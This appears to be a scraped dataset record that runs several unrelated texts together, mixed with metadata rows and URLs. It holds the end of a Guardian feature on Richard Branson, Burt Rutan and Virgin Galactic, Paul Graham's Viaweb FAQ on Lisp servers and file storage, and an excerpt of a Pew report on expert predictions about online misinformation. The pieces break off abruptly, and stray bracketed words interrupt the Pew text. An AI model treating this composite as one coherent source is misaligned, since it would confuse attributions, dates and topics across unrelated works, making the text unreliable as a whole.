“In the mid-60s, a friend of mine, Mike Adams, got killed during a re-entry.” They had been stationed together at the Edwards Air Force base in Lancaster, California, when Adams, test flying an experimental suborbital plane called the X-15, “didn’t line the angles up. He was killed because the requirement to do a precision re-entry had not been met.”
Adams’s death stayed with Burt, he says, even when he left the air force and set up business in a hangar at the Mojave airport, designing prototype planes. “It was just a deserted old second world war training airport in a crummy little desert town. I had a family, which I lost mainly because I was a workaholic.” He says most aerospace engineers work on an average of two-and-a-half planes during their whole careers. He was building one every year, “without ever injuring a test pilot. You can’t have more fun than a first flight when you find out if your friend lives or dies flying it. And I flew six first flights myself. With a tiny crew of three dozen people who worked their asses off.”
He says you won’t find his inventions in the big airliners – the Boeings and Airbuses. They’re overly risk-averse and conservative, which is why their planes look identical. But the private jet companies have embraced his creations – planes such as the Beech Starship. And throughout it all he brooded over the death of Mike Adams and wondered how he might invent “carefree re-entry”.
He says there was no great Eureka moment with his shuttlecock idea. But one day he felt confident enough to approach Paul Allen and say, “ ‘I would now put my own money into it if I had the money.’ And he put out his hand and we had a handshake. That was the extent of the begging for money I did for SpaceShipOne. He gave me several million dollars and said, ‘Here. Get going.’”
“What’s Paul Allen like?” I ask.
“Opposite of Sir Richard,” Burt replies. “I could call Sir Richard while he’s sleeping at home in Necker island and chat with him. We debate global warming fraud all the time.”
“Hang on,” I say. “Which of you thinks it’s a fraud?”
“He thinks it exists; I think it stopped 17 years ago,” Rutan replies. “Anyway. Paul Allen’s own people can’t just walk into his office. They schedule a meeting a couple of weeks in advance. On the few occasions I was alone with Paul, his own people would rush up to me and go, ‘What did he *say*?’ But if he says something, everybody listens, because it’s an important thing to be said.”
Between 2001 and 2003, SpaceShipOne was a covert endeavour. Nobody outside Burt’s weather-beaten hangar knew they were “developing all the elements of an entire manned space programme. We developed the launch airplane, the White Knight. We developed our own rocket engine, and a rocket test facility, and the navigation system that the pilot looks at to steer it into space. We built a simulator. And, of course, we built SpaceShipOne and trained the astronauts. In 2004, we flew three of the entire world’s five space flights – funded not by a government but by a billionaire who made software. This private little thing. Later, people said I must have had help from Nasa. I didn’t want Nasa to know. And they didn’t.”
Since then, Rutan says, history has proved his shuttlecock mechanism to be foolproof. “People told me it would go into an unrecoverable flat spin, but I knew in my gut it would work. And it worked perfectly the first time and every time. It has never had to be tweaked or modified. Which is crazy, because it’s so bizarre.”
Any delays these past 10 years, he says, have been due to the complexity of the rocket motor design and the fact that Virgin Galactic is full of “smart people” – by which he means committees: interior design committees, PR committees, safety committees. He sounds a bit rueful about this, like if they had listened to him, it could all have gone a lot faster.
He doesn’t mention the accident. I’m not relishing asking him about it, because I’m sure it was the worst day of his life, but when I do, he immediately says, “Sure, I’ll talk about that.”
He won’t go into its cause much – only that it was a “very routine” test that fell victim to “a combination of some very unusual things”. He pauses. “All of us would be bolt upright at two in the morning for a while after that.” And even though he was 220 miles from the explosion, the shock almost killed him, too. “My health deteriorated to where I could almost not walk. I just seemed to get weaker and weaker every day.” He says that if I saw pictures from the unveiling of SpaceShipTwo at the Museum of Natural History in New York that following January, I’d see a man “incapable of walking up three or four steps”. (I do see those pictures later and he does looks terrible.) Eventually his condition was diagnosed as constrictive pericarditis – a hardening of the sac around the heart. He says that as an engineer he can’t bring himself to believe that the stress of the accident hardened a membrane: “That wouldn’t make sense.” But his wife is convinced of it.
At the end of our conversation, Rutan suddenly says, “If there’s an industrial accident at a corporation and three people are killed and three people are seriously injured, how often is there a lawsuit where the families sue the company?”
“Almost every time,” I say.
“There was none,” he says. “There was none. We wrapped ourselves in the families. We told them the truth from the start. None of them sued us. Each of those families is a friend of the company. And that has a lot to say about something that I’m most proud of in my career, and that is how to run a business from an ethical standpoint.”
Later, I look at the memorial website for one of the men who died, Eric Dean Blackwell. It is maintained by his wife, Kim. At the bottom there’s a link to Virgin Galactic, so people can read updates on how the programme is progressing.
Back in Mojave, I’d mentioned to Branson that 10 years earlier I’d read the critical Tom Bower biography, Branson, and that when I later asked Bower if he had anything good to say about Branson, he replied, “No.”
“Oh, he’s forecast our financial demise,” Branson replied. “The thing is, he got a bit lucky with Robert Maxwell and everyone he’s done since then he thinks is in Robert Maxwell’s clothing.”
Last month, there was a flurry of Tom Bower activity. He’s written a new book, Branson: Behind The Mask, in which he claims that Virgin Galactic is a “white elephant” with no licence to fly into space and no rocket powerful enough to take passengers anyway. I email Branson’s people. They reply with a statement that the rocket motor has “burned for full duration and thrust multiple times” during tests, and that they expect to receive the full licence “well in advance of commercial service. Richard,” they say, “remains extremely confident of a 2014 launch.”
Branson hopes that his future astronauts’ five weightless minutes will be only the beginning, and that “suborbital point-to-point travel” is next. This means a journey on SpaceShipTwo that will actually go somewhere, and not just up and down. They could fly from London to Australia in two-and-a-half hours, Branson tells me. And then there are the satellites. “We can put up 15,000 satellites over a six-month period,” he said, “which is more than there are up in the air today. For the three billion people who are in the poverty trap, they’re likely to get access to mobiles and internet for a fraction of what it now costs.”
And this, Branson insists, is imminent. A test flight into space – empty of passengers – will happen in the next few months (Virgin are vague on the details). And the first six astronauts, including Branson and his children, Sam and Holly, should be up later this year. The inaugural flight will be televised live by NBC. The TV company has put out a press statement about it: “Without a doubt, Sir Richard and his children taking the first commercial flight into space will go down in history as one of the most memorable events on television.”
Branson told me back in Mojave that his “eyes are open” about making his family the guinea pigs. “Everybody who signs up knows this is the birth of a new space programme and understands the risks that go with that,” he said. Then he paused. “But every person wants to go on the first flight.”
## Comments (…)
Sign in or create your Guardian account to join the discussion | true | true | true | After a 10-year wait, Richard Branson says Virgin Galactic will have lift-off this year: he and his children will be on the first (live televised) flight. What took them so long? Jon Ronson meets him and the 'future astronauts' as they prepare for the ride of their lives | 2024-10-12 00:00:00 | 2014-02-21 00:00:00 | article | theguardian.com | The Guardian | null | null |
|
10,433,050 | http://paultyma.blogspot.com/2015/10/how-artificial-intelligence-will-really.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
1,949,751 | http://www.khanacademy.org/#Venture%20Capital%20and%20Capital%20Markets | Khan Academy | null | null | true | true | false | null | 2024-10-12 00:00:00 | 2024-10-11 00:00:00 | null | null | null | null | null | null |
17,274,397 | https://fastjs.link | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
7,463,937 | http://expandedconsciousness.com/2014/03/25/anti-gravity-ball-by-mit-opens-new-dimensions/ | null | null | null | true | true | false | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
11,303,366 | https://medium.com/zargethq-stories/rip-session-recording-d1c739375c0e#.fj413xije | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
37,920 | http://www.paulgraham.com/vwfaq.html | Viaweb FAQ | null | | |
**How did the editor handle client sessions?**
There was one Lisp process for each user. When someone logged
in to edit their site, we'd start up a new process and load all
their data into memory. From that point they had an ongoing
conversation with that process.
Because everything was already loaded into memory, we never
had to read anything from disk or start up a process to
respond to an HTTP request. All we had to do was evaluate
a closure stored in memory.
**What did you use for an HTTP server?**
At first the editor had its own HTTP server, written in Common Lisp
by Robert Morris. Later we switched to a version of
Apache that he hacked to talk to Lisp.
**What Lisp did you use?**
Clisp.
**Did you use real continuations to save state?**
No, we used macros to fake them in Common Lisp, as described in
On Lisp.
**What database did you use?**
We didn't use one. We just stored everything in files.
The Unix file system is pretty good at not losing your data,
especially if you put the files on a Netapp.
It is a common mistake to think of Web-based apps as interfaces to databases.
Desktop apps aren't just interfaces to databases; why should Web-based apps
be any different? The hard part is not where you store the data, but
what the software does.
While we were doing Viaweb, we took a good
deal of heat from pseudo-technical people like VCs and industry
analysts for not using a database-- and for using cheap Intel
boxes running FreeBSD as servers. But when we were getting
bought by Yahoo, we found that they also just stored everything
in files-- and all their servers were also cheap Intel boxes
running FreeBSD.
(During the Bubble, Oracle used to run ads saying that Yahoo
ran on Oracle software. I found this hard to believe, so I asked around.
It turned out the Yahoo *accounting* department used Oracle.)
**Was your co-founder the same Robert Morris who wrote the worm
and is now a professor at MIT?**
Yes.
**Where did you get venture funding?**
We got money from several private investors, what are known in the
business as "angels." Our investors were pretty serious,
almost VCs, but they weren't actually brand-name VC firms.
We did Viaweb very cheaply. We spent a total of about $2 million.
We were just about breaking even when we got bought, so we
would not have spent too much more.
**How was "Viaweb" pronounced?**
The official policy was that you could say either vee-a-web or
vie-a-web. We all used the former, but everyone else, including
the people at Yahoo, seemed to prefer the latter.
**What would you do differently?**
Technically, not much. I think the main thing we should have done
that we didn't was start some kind of online store ourselves. We
used the editor to make our own site, so we were pretty motivated
to make it good. But we could only understand the e-commerce
part of the software second-hand.
|
| | true | true | true | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
15,546,928 | http://www.pewinternet.org/2017/10/19/the-future-of-truth-and-misinformation-online/ | The Future of Truth and Misinformation Online | Janna Anderson; Lee Rainie | In late 2016, Oxford Dictionaries selected “post-truth” as the word of the year, defining it as “relating to or denoting circumstances in which objective facts are less influential in shaping public opinion than appeals to emotion and personal belief.”
The 2016 Brexit vote in the United Kingdom and the tumultuous U.S. presidential election highlighted how the digital age has affected news and cultural narratives. New information platforms feed the ancient instinct people have to find information that syncs with their perspectives: A 2016 study that analyzed 376 million Facebook users’ interactions with over 900 news outlets found that people tend to seek information that aligns with their views.
This makes many vulnerable to accepting and acting on misinformation. For instance, after fake news stories in June 2017 reported Ethereum’s founder Vitalik Buterin had died in a car crash its market value was reported to have dropped by $4 billion.
Misinformation is not like a plumbing problem you fix. It is a social condition, like crime, that you must constantly monitor and adjust to. Tom Rosenstiel
When BBC Future Now interviewed a panel of 50 experts in early 2017 about the “grand challenges we face in the 21st century” many named the breakdown of trusted information sources. “The major new challenge in reporting news is the new shape of truth,” said Kevin Kelly, co-founder of Wired magazine. “Truth is no longer dictated by authorities, but is networked by peers. For every fact there is a counterfact and all these counterfacts and facts look identical online, which is confusing to most people.”
Americans worry about that: A Pew Research Center study conducted just after the 2016 election found 64% of adults believe fake news stories cause a great deal of confusion and 23% said they had shared fabricated political stories themselves – sometimes by mistake and sometimes intentionally.
The question arises, then: What will happen to the online information environment in the coming decade? In summer 2017, Pew Research Center and Elon University’s Imagining the Internet Center conducted a large canvassing of technologists, scholars, practitioners, strategic thinkers and others, asking them to react to this framing of the issue:
*The rise of “fake news” and the proliferation of doctored narratives that are spread by humans and bots online are challenging publishers and platforms. Those trying to stop the spread of false information are working to design technical and human systems that can weed it out and minimize the ways in which bots and other schemes spread lies and misinformation.*
*The question: In the next 10 years, will trusted methods emerge to block false narratives and allow the most accurate information to prevail in the overall information ecosystem? Or will the quality and veracity of information online deteriorate due to the spread of unreliable, sometimes even dangerous, socially destabilizing ideas?*
Respondents were then asked to choose one of the following answer options:
The information environment **will improve** – In the next 10 years, on balance, the information environment will be IMPROVED by changes that reduce the spread of lies and other misinformation online.
The information environment **will NOT improve** – In the next 10 years, on balance, the information environment will NOT BE improved by changes designed to reduce the spread of lies and other misinformation online.
Some 1,116 responded to this nonscientific canvassing: **51**% chose the option that the information environment will not improve, and **49%** said the information environment will improve. (See “About this canvassing of experts” for details about this sample.) Participants were next asked to explain their answers. This report concentrates on these follow-up responses.
Their reasoning revealed a wide range of opinions about the nature of these threats and the most likely solutions required to resolve them. But the overarching and competing themes were clear: Those who do not think things will improve felt that humans mostly shape technology advances to their own, not-fully-noble purposes and that bad actors with bad motives will thwart the best efforts of technology innovators to remedy today’s problems.
And those who are most hopeful believed that technological fixes can be implemented to bring out the better angels guiding human nature.
More specifically, the 51% of these experts who expect things will* not improve* generally cited two reasons:
**The fake news ecosystem preys on some of our deepest human instincts:** Respondents said humans’ primal quest for success and power – their “survival” instinct – will continue to degrade the online information environment in the next decade. They predicted that manipulative actors will use new digital tools to take advantage of humans’ inbred preference for comfort and convenience and their craving for the answers they find in reinforcing echo chambers.
**Our brains are not wired to contend with the pace of technological change:** These respondents said the rising speed, reach and efficiencies of the internet and emerging online applications will magnify these human tendencies and that technology-based solutions will not be able to overcome them. They predicted a future information landscape in which fake information crowds out reliable information. Some even foresaw a world in which widespread information scams and mass manipulation cause broad swathes of public to simply give up on being informed participants in civic life.
The 49% of these experts who expect things to * improve* generally inverted that reasoning:
**Technology can help fix these problems:** These more hopeful experts said the rising speed, reach and efficiencies of the internet, apps and platforms can be harnessed to rein in fake news and misinformation campaigns. Some predicted better methods will arise to create and promote trusted, fact-based news sources.
**It is also human nature to come together and fix problems:** The hopeful experts in this canvassing took the view that people have always adapted to change and that this current wave of challenges will also be overcome. They noted that misinformation and bad actors have always existed but have eventually been marginalized by smart people and processes. They expect well-meaning actors will work together to find ways to enhance the information environment. They also believe better information literacy among citizens will enable people to judge the veracity of material content and eventually raise the tone of discourse.
The majority of participants in this canvassing wrote detailed elaborations on their views. Some chose to have their names connected to their answers; others opted to respond anonymously. These findings do not represent all possible points of view, but they do reveal a wide range of striking observations.
Respondents collectively articulated several major themes tied to those insights and explained in the sections below the following graphic. Several longer additional sets of responses tied to these themes follow that summary.
The following section presents an overview of the themes found among the written responses, including a small selection of representative quotes supporting each point. Some comments are lightly edited for style or length.
### Theme 1: The information environment will not improve: The problem is human nature
Most respondents who expect the environment to worsen said human nature is at fault. For instance, **Christian H. Huitema**, former president of the Internet Architecture Board, commented, “The quality of information will not improve in the coming years, because technology can’t improve human nature all that much.”
These experts predicted that the problem of misinformation will be amplified because the worst side of human nature is magnified by bad actors using advanced online tools at internet speed on a vast scale.
The quality of information will not improve in the coming years, because technology can’t improve human nature all that much. Christian H. Huitema
**Tom Rosenstiel**, author, director of the American Press Institute and senior fellow at the Brookings Institution, commented, “Whatever changes platform companies make, and whatever innovations fact checkers and other journalists put in place, those who want to deceive will adapt to them. Misinformation is not like a plumbing problem you fix. It is a social condition, like crime, that you must constantly monitor and adjust to. Since as far back as the era of radio and before, as Winston Churchill said, ‘A lie can go around the world before the truth gets its pants on.’”
**Michael J. Oghia**, an author, editor and journalist based in Europe, said he expects a worsening of the information environment due to five things: “1) The spread of misinformation and hate; 2) Inflammation, sociocultural conflict and violence; 3) The breakdown of socially accepted/agreed-upon knowledge and what constitutes ‘fact.’ 4) A new digital divide of those subscribed (and ultimately controlled) by misinformation and those who are ‘enlightened’ by information based on reason, logic, scientific inquiry and critical thinking. 5) Further divides between communities, so that as we are more connected we are farther apart. And many others.”
**Leah Lievrouw**, professor in the department of information studies at the University of California, Los Angeles, observed, “So many players and interests see online information as a uniquely powerful shaper of individual action and public opinion in ways that serve their economic or political interests (marketing, politics, education, scientific controversies, community identity and solidarity, behavioral ‘nudging,’ etc.). These very diverse players would likely oppose (or try to subvert) technological or policy interventions or other attempts to insure the quality, and especially the disinterestedness, of information.”
#### Subtheme: More people = more problems. The internet’s continuous growth and accelerating innovation allow more people and artificial intelligence (AI) to create and instantly spread manipulative narratives
While propaganda and the manipulation of the public via falsehoods is a tactic as old as the human race, many of these experts predicted that the speed, reach and low cost of online communication plus continuously emerging innovations will magnify the threat level significantly. A** professor at a Washington, D.C.-area university** said, “It is nearly impossible to implement solutions at scale – the attack surface is too large to be defended successfully.”
**Jerry Michalski,** futurist and founder of REX, replied, “The trustworthiness of our information environment will decrease over the next decade because: 1) It is inexpensive and easy for bad actors to act badly; 2) Potential technical solutions based on strong ID and public voting (for example) won’t quite solve the problem; and 3) real solutions based on actual trusted relationships will take time to evolve – likely more than a decade.”
It is nearly impossible to implement solutions at scale – the attack surface is too large to be defended successfully. Anonymous professor
An** institute director and university professor** said, “The internet is the 21st century’s threat of a ‘nuclear winter,’ and there’s no equivalent international framework for nonproliferation or disarmament. The public can grasp the destructive power of nuclear weapons in a way they will never understand the utterly corrosive power of the internet to civilized society, when there is no reliable mechanism for sorting out what people can believe to be true or false.”
**Bob Frankston**, internet pioneer and software innovator, said, “I always thought that ‘Mein Kampf’ could be countered with enough information. Now I feel that people will tend to look for confirmation of their biases and the radical transparency will not shine a cleansing light.”
**David Harries**, associate executive director for Foresight Canada, replied, “More and more, history is being written, rewritten and corrected, because more and more people have the ways and means to do so. Therefore there is ever more information that competes for attention, for credibility and for influence. The competition will complicate and intensify the search for veracity. Of course, many are less interested in veracity than in winning the competition.”
**Glenn Edens**, CTO for technology reserve at PARC, a Xerox company, commented, “Misinformation is a two-way street. Producers have an easy publishing platform to reach wide audiences and those audiences are flocking to the sources. The audiences typically are looking for information that fits their belief systems, so it is a really tough problem.”
#### Subtheme: Humans are by nature selfish, tribal, gullible convenience seekers who put the most trust in that which seems familiar
The respondents who supported this view noted that people’s actions – from consciously malevolent and power-seeking behaviors to seemingly more benign acts undertaken for comfort or convenience – will work to undermine a healthy information environment.
People on systems like Facebook are increasingly forming into ‘echo chambers’ of those who think alike. They will keep unfriending those who don’t, and passing on rumors and fake news that agrees with their point of view. Starr Roxanne Hiltz
An **executive consultant based in North America** wrote, “It comes down to motivation: There is no market for the truth. The public isn’t motivated to seek out verified, vetted information. They are happy hearing what confirms their views. And people can gain more creating fake information (both monetary and in notoriety) than they can keeping it from occurring.”
**Serge Marelli**, an IT professional who works on and with the Net, wrote, “As a group, humans are ‘stupid.’ It is ‘group mind’ or a ‘group phenomenon’ or, as George Carlin said, ‘Never underestimate the power of stupid people in large groups.’ Then, you have Kierkegaard, who said, ‘People demand freedom of speech as a compensation for the freedom of thought which they seldom use.’ And finally, Euripides said, ‘Talk sense to a fool and he calls you foolish.’”
**Starr Roxanne Hiltz**, distinguished professor of information systems and co-author of the visionary 1970s book “The Network Nation,” replied, “People on systems like Facebook are increasingly forming into ‘echo chambers’ of those who think alike. They will keep unfriending those who don’t, and passing on rumors and fake news that agrees with their point of view. When the president of the U.S. frequently attacks the traditional media and anybody who does not agree with his ‘alternative facts,’ it is not good news for an uptick in reliable and trustworthy facts circulating in social media.”
**Nigel Cameron**, a technology and futures editor and president of the Center for Policy on Emerging Technologies, said, “Human nature is not EVER going to change (though it may, of course, be manipulated). And the political environment is bad.”
**Ian O’Byrne**, assistant professor at the College of Charleston, replied, “Human nature will take over as the salacious is often sexier than facts. There are multiple information streams, public and private, that spread this information online. We can also not trust the businesses and industries that develop and facilitate these digital texts and tools to make changes that will significantly improve the situation.”
**Greg Swanson**, media consultant with ITZonTarget, noted, “The sorting of reliable versus fake news requires a trusted referee. It seems unlikely that government can play a meaningful role as this referee. We are too polarized. And we have come to see the television news teams as representing divergent points of view, and, depending on your politics, the network that does not represent your views is guilty of ‘fake news.’ It is hard to imagine a fair referee that would be universally trusted.”
[that]
There were also those among these expert respondents who said inequities, perceived and real, are at the root of much of the misinformation being produced.
A **professor at MIT** observed, “I see this as problem with a socioeconomic cure: Greater equity and justice will achieve much more than a bot war over facts. Controlling ‘noise’ is less a technological problem than a human problem, a problem of belief, of ideology. Profound levels of ungrounded beliefs about things both sacred and profane existed before the branding of ‘fake news.’ Belief systems – not ‘truths’ – help to cement identities, forge relationships, explain the unexplainable.”
**Julian Sefton-Green**, professor of new media education at Deakin University in Australia, said, “The information environment is an extension of social and political tensions. It is impossible to make the information environment a rational, disinterested space; it will always be susceptible to pressure.”
A **respondent affiliated with Harvard University’s Berkman Klein Center for Internet & Society** wrote, “The democratization of publication and consumption that the networked sphere represents is too expansive for there to be any meaningful improvement possible in terms of controlling or labeling information. People will continue to cosset their own cognitive biases.”
#### Subtheme: In existing economic, political and social systems, the powerful corporate and government leaders most able to improve the information environment profit most when it is in turmoil
A large number of respondents said the interests of the most highly motivated actors, including those in the worlds of business and politics, are generally not motivated to “fix” the proliferation of misinformation. Those players will be a key driver in the worsening of the information environment in the coming years and/or the lack of any serious attempts to effectively mitigate the problem.
**Scott Shamp**, a dean at Florida State University, commented, “Too many groups gain power through the proliferation of inaccurate or misleading information. When there is value in misinformation, it will rule.”
Big political players have just learned how to play this game. I don’t think they will put much effort into eliminating it. Zbigniew Łukasiak
[information]
**Stephen Downes**, researcher with the National Research Council of Canada, wrote, “Things will not improve. There is too much incentive to spread disinformation, fake news, malware and the rest. Governments and organizations are major actors in this space.”
An **anonymous respondent** said, “Actors can benefit socially, economically, politically by manipulating the information environment. As long as these incentives exist, actors will find a way to exploit them. These benefits are not amenable to technological resolution as they are social, political and cultural in nature. Solving this problem will require larger changes in society.”
[This]
**Seth Finkelstein**, consulting programmer and winner of the Electronic Freedom Foundation’s Pioneer Award, commented, “Virtually all the structural incentives to spread misinformation seem to be getting worse.”
A **data scientist based in Europe** wrote, “The information environment is built on the top of telecommunication infrastructures and services developed following the free-market ideology, where ‘truth’ or ‘fact’ are only useful as long as they can be commodified as market products.”
**Zbigniew Łukasiak**, a business leader based in Europe, wrote, “Big political players have just learned how to play this game. I don’t think they will put much effort into eliminating it.”
A **vice president for public policy at one of the world’s foremost entertainment and media companies **commented, “The small number of dominant online platforms do not have the skills or ethical center in place to build responsible systems, technical or procedural. They eschew accountability for the impact of their inventions on society and have not developed any of the principles or practices that can deal with the complex issues. They are like biomedical or nuclear technology firms absent any ethics rules or ethics training or philosophy. Worse, their active philosophy is that assessing and responding to likely or potential negative impacts of their inventions is both not theirs to do and even shouldn’t be done.”
**Patricia Aufderheide**, professor of communications and founder of the Center for Media and Social Impact at American University, said, “Major interests are not invested enough in reliability to create new business models and political and regulatory standards needed for the shift. … Overall there are powerful forces, including corporate investment in surveillance-based business models, that create many incentives for unreliability, ‘invisible handshake’ agreements with governments that militate against changing surveillance models, international espionage at a governmental and corporate level in conjunction with mediocre cryptography and poor use of white hat hackers, poor educational standards in major industrial countries such as the U.S., and fundamental weaknesses in the U.S. political/electoral system that encourage exploitation of unreliability. It would be wonderful to believe otherwise, and I hope that other commentators will be able to convince me otherwise.”
**James Schlaffer**, an assistant professor of economics, commented, “Information is curated by people who have taken a step away from the objectivity that was the watchword of journalism. Conflict sells, especially to the opposition party, therefore the opposition news agency will be incentivized to push a narrative and agenda. Any safeguards will appear as a way to further control narrative and propagandize the population.”
#### Subtheme: Human tendencies and infoglut drive people apart and make it harder for them to agree on “common knowledge.” That makes healthy debate difficult and destabilizes trust. The fading of news media contributes to the problem
Many respondents expressed concerns about how people’s struggles to find and apply accurate information contribute to a larger social and political problem: There is a growing deficit in commonly accepted facts or some sort of cultural “common ground.” Why has this happened? They cited several reasons:
- Online echo chambers or silos divide people into separate camps, at times even inciting them to express anger and hatred at a volume not seen in previous communications forms.
- Information overload crushes people’s attention spans. Their coping mechanism is to turn to entertainment or other lighter fare.
- High-quality journalism has been decimated due to changes in the attention economy.
They said these factors and others make it difficult for many people in the digital age to create and come to share the type of “common knowledge” that undergirds better and more-responsive public policy. A share of respondents said a lack of commonly shared knowledge leads many in society to doubt the reliability of everything, causing them to simply drop out of civic participation, depleting the number of active and informed citizens.
**Jamais Cascio**, distinguished fellow at the Institute for the Future, noted, “The power and diversity of very low-cost technologies allowing unsophisticated users to create believable ‘alternative facts’ is increasing rapidly. It’s important to note that the goal of these tools is not necessarily to create consistent and believable alternative facts, but to create plausible levels of doubt in actual facts. The crisis we face about ‘truth’ and reliable facts is predicated less on the ability to get people to believe the *wrong* thing as it is on the ability to get people to *doubt* the right thing. The success of Donald Trump will be a flaming signal that this strategy works, alongside the variety of technologies now in development (and early deployment) that can exacerbate this problem. In short, it’s a successful strategy, made simpler by more powerful information technologies.”
**Philip J. Nickel**, lecturer at Eindhoven University of Technology in the Netherlands, said, “The decline of traditional news media and the persistence of closed social networks will not change in the next 10 years. These are the main causes of the deterioration of a public domain of shared facts as the basis for discourse and political debate.”
**Kenneth Sherrill**, professor emeritus of political science at Hunter College, City University of New York, predicted, “Disseminating false rumors and reports will become easier. The proliferation of sources will increase the number of people who don’t know who or what they trust. These people will drop out of the normal flow of information. Participation will decline as more and more citizens become unwilling/unable to figure out which information sources are reliable.”
The crisis we face about ‘truth’ and reliable facts is predicated less on the ability to get people to believe the *wrong* thing as it is on the ability to get people to *doubt* the right thing. Jamais Cascio
What is truth? What is a fact? Who gets to decide? And can most people agree to trust anything as “common knowledge”? A number of respondents challenged the idea that any individuals, groups or technology systems could or should “rate” information as credible, factual, true or not.
An **anonymous respondent** observed, “Whatever is devised will not be seen as impartial; some things are not black and white; for other situations, facts brought up to come to a conclusion are different that other facts used by others in a situation. Each can have real facts, but it is the facts that are gathered that matter in coming to a conclusion; who will determine what facts will be considered or what is even considered a fact.”
A **research assistant at MIT **noted, “‘Fake’ and ‘true’ are not as binary as we would like, and – combined with an increasingly connected and complex digital society – it’s a challenge to manage the complexity of social media without prescribing a narrative as ‘truth.’”
An **internet pioneer and longtime leader at ICANN** said, “There is little prospect of a forcing factor that will emerge that will improve the ‘truthfulness’ of information in the internet.”
A** vice president for stakeholder engagement** said, “Trust networks are best established with physical and unstructured interaction, discussion and observation. Technology is reducing opportunities for such interactions and disrupting human discourse, while giving the ‘feeling’ that we are communicating more than ever.”
#### Subtheme: A small segment of society will find, use and perhaps pay a premium for information from reliable sources. Outside of this group “chaos will reign” and a worsening digital divide will develop
Some respondents predicted that a larger digital divide will form. Those who pursue more-accurate information and rely on better-informed sources will separate from those who are not selective enough or who do not invest either the time or the money in doing so.
There will be a sort of ‘gold standard’ set of sources, and there will be the fringe. Anonymous respondent.
**Alejandro Pisanty**, a professor at UNAM, the National University of Mexico, and longtime internet policy leader, observed, “Overall, at least a part of society will value trusted information and find ways to keep a set of curated, quality information resources. This will use a combination of organizational and technological tools but above all, will require a sharpened sense of good judgment and access to diverse, including rivalrous, sources. Outside this, chaos will reign.”
**Alexander Halavais**, associate professor of social technologies at Arizona State University, said, “As there is value in accurate information, the availability of such information will continue to grow. However, when consumers are not directly paying for such accuracy, it will certainly mean a greater degree of misinformation in the public sphere. That means the continuing bifurcation of haves and have-nots, when it comes to trusted news and information.”
An **anonymous editor and publisher** commented, “Sadly, many Americans will not pay attention to ANY content from existing or evolving sources. It’ll be the continuing dumbing down of the masses, although the ‘upper’ cadres (educated/thoughtful) will read/see/know, and continue to battle.”
An **anonymous respondent** said, “There will be a sort of ‘gold standard’ set of sources, and there will be the fringe.”
### Theme 2: The information environment will not improve because technology will create new challenges that can’t or won’t be countered effectively and at scale
Many who see little hope for improvement of the information environment said technology will not save society from distortions, half-truths, lies and weaponized narratives. An **anonymous business leader** argued, “It is too easy to create fake facts, too labor-intensive to check and too easy to fool checking algorithms.’’ And this response of an anonymous **research scientist based in North America** echoed the view of many participants in this canvassing: “We will develop technologies to help identify false and distorted information, BUT they won’t be good enough.”
In the arms race between those who want to falsify information and those who want to produce accurate information, the former will always have an advantage. David Conrad
**Paul N. Edwards**, Perry Fellow in International Security at Stanford University, commented, “Many excellent methods will be developed to improve the information environment, but the history of online systems shows that bad actors can and will always find ways around them.”
**Vian Bakir**, professor in political communication and journalism at Bangor University in Wales, commented, “It won’t improve because of 1) the evolving nature of technology – emergent media always catches out those who wish to control it, at least in the initial phase of emergence; 2) online social media and search engine business models favour misinformation spreading; 3) well-resourced propagandists exploit this mix.”
Many who expect things will not improve in the next decade said that “white hat” efforts will never keep up with “black hat” advances in information wars. A **user-experience and interaction designer** said, “As existing channels become more regulated, new unregulated channels will continue to emerge.”
#### Subtheme: Those generally acting for themselves and not the public good have the advantage, and they are likely to stay ahead in the information wars
Many of those who expect no improvement of the information environment said those who wish to spread misinformation are highly motivated to use innovative tricks to stay ahead of the methods meant to stop them. They said certain actors in government, business and other individuals with propaganda agendas are highly driven to make technology work in their favor in the spread of misinformation, and there will continue to be more of them.
There are a lot of rich and unethical people, politicians, non-state actors and state actors who are strongly incentivized to get fake information out there to serve their selfish purposes. Jason Hong
A number of respondents referred to this as an “arms race.” **David Sarokin** of Sarokin Consulting and author of “Missed Information,” said, “There will be an arms race between reliable and unreliable information.” And **David Conrad**, a chief technology officer, replied, “In the arms race between those who want to falsify information and those who want to produce accurate information, the former will always have an advantage.”
**Jim Hendler**, professor of computing sciences at Rensselaer Polytechnic Institute, commented, “The information environment will continue to change but the pressures of politics, advertising and stock-return-based capitalism rewards those who find ways to manipulate the system, so it will be a constant battle between those aiming for ‘objectiveness’ and those trying to manipulate the system.”
**John Markoff**, retired journalist and former technology reporter for The New York Times, said, “I am extremely skeptical about improvements related to verification without a solution to the challenge of anonymity on the internet. I also don’t believe there will be a solution to the anonymity problem in the near future.”
**Scott Spangler**, principal data scientist at IBM Watson Health, said technologies now exist that make fake information almost impossible to discern and flag, filter or block. He wrote, “Machine learning and sophisticated statistical techniques will be used to accurately simulate real information content and make fake information almost indistinguishable from the real thing.”
**Jason Hong**, associate professor at the School of Computer Science at Carnegie Mellon University, said, “Some fake information will be detectable and blockable, but the vast majority won’t. The problem is that it’s *still* very hard for computer systems to analyze text, find assertions made in the text and crosscheck them. There’s also the issue of subtle nuances or differences of opinion or interpretation. Lastly, the incentives are all wrong. There are a lot of rich and unethical people, politicians, non-state actors and state actors who are strongly incentivized to get fake information out there to serve their selfish purposes.”
A **research professor of robotics at Carnegie Mellon University** observed, “Defensive innovation is always behind offensive innovation. Those wanting to spread misinformation will always be able to find ways to circumvent whatever controls are put in place.”
A **research scientist for the Computer Science and Artificial Intelligence Laboratory at MIT **said, “Problems will get worse faster than solutions can address, but that only means solutions are more needed than ever.”
#### Subtheme: Weaponized narratives and other false content will be magnified by social media, online filter bubbles and AI
Some respondents expect a dramatic rise in the manipulation of the information environment by nation-states, by individual political actors and by groups wishing to spread propaganda. Their purpose is to raise fears that serve their agendas, create or deepen silos and echo chambers, divide people and set them upon each other, and paralyze or confuse public understanding of the political, social and economic landscape.
We live in an era where most people get their ‘news’ via social media and it is very easy to spread fake news. … Given that there is freedom of speech, I wonder how the situation can ever improve. Anonymous project leader for a science institute
This has been referred to as the weaponization of public narratives. Social media platforms such as Facebook, Reddit and Twitter appear to be prime battlegrounds. Bots are often employed, and AI is expected to be implemented heavily in the information wars to magnify the speed and impact of messaging.
